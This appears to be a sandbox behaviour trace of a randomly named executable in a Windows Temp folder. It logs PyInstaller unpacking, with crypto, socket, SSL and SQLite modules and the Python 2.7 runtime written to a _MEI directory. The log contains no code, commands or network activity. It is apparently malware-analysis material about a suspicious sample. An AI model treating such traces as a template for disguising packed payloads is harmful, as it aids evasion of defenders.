Environment Set Environment String name = _MEIPASS2 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 512, size_out = 96 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 1024, size_out = 1024 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 512, size_out = 408 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 16384, size_out = 16384 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802, type = file_attributes False 1
Fn
File Create Directory C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._AES.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._AES.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._AES.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._AES.pyd, size = 28672 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._AES.pyd, size = 512 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 16384, size_out = 16384 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._DES3.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._DES3.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._DES3.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._DES3.pyd, size = 53248 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._DES3.pyd, size = 1536 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 2
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Hash._SHA256.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Hash._SHA256.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Hash._SHA256.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Hash._SHA256.pyd, size = 8192 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Hash._SHA256.pyd, size = 2048 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 2
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Random.OSRNG.winrandom.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Random.OSRNG.winrandom.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Random.OSRNG.winrandom.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Random.OSRNG.winrandom.pyd, size = 8192 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Random.OSRNG.winrandom.pyd, size = 1536 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 2
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Util._counter.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Util._counter.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Util._counter.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Util._counter.pyd, size = 8192 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Util._counter.pyd, size = 2048 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Microsoft.VC90.CRT.manifest, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Microsoft.VC90.CRT.manifest, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Microsoft.VC90.CRT.manifest, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Microsoft.VC90.CRT.manifest, size = 1050 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 40960, size_out = 40960 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ctypes.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ctypes.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ctypes.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ctypes.pyd, size = 90112 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ctypes.pyd, size = 3072 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 475136, size_out = 475136 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_hashlib.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_hashlib.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_hashlib.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_hashlib.pyd, size = 1011712 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_hashlib.pyd, size = 3072 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 20480, size_out = 20480 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_socket.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_socket.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_socket.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_socket.pyd, size = 45056 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_socket.pyd, size = 3072 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 20480, size_out = 20480 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_sqlite3.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_sqlite3.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_sqlite3.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_sqlite3.pyd, size = 49152 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_sqlite3.pyd, size = 2560 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 671744, size_out = 671744 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ssl.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ssl.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ssl.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ssl.pyd, size = 1404928 True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ssl.pyd, size = 1024 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 36864, size_out = 36864 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\bz2.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\bz2.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\bz2.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\bz2.pyd, size = 69632 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\bz2.pyd, size = 3072 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\main.exe.manifest, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\main.exe.manifest, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\main.exe.manifest, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\main.exe.manifest, size = 1008 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536, size_out = 65536 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcm90.dll, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcm90.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcm90.dll, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcm90.dll, size = 225280 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 155648, size_out = 155648 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcp90.dll, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcp90.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcp90.dll, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcp90.dll, size = 569344 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcp90.dll, size = 336 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 315392, size_out = 315392 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcr90.dll, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcr90.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcr90.dll, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcr90.dll, size = 651264 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcr90.dll, size = 1872 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 57344, size_out = 57344 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pyexpat.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pyexpat.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pyexpat.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pyexpat.pyd, size = 135168 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pyexpat.pyd, size = 3072 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 1200128, size_out = 1200128 True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll, size = 2629632 True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll, size = 2048 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 40960, size_out = 40960 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
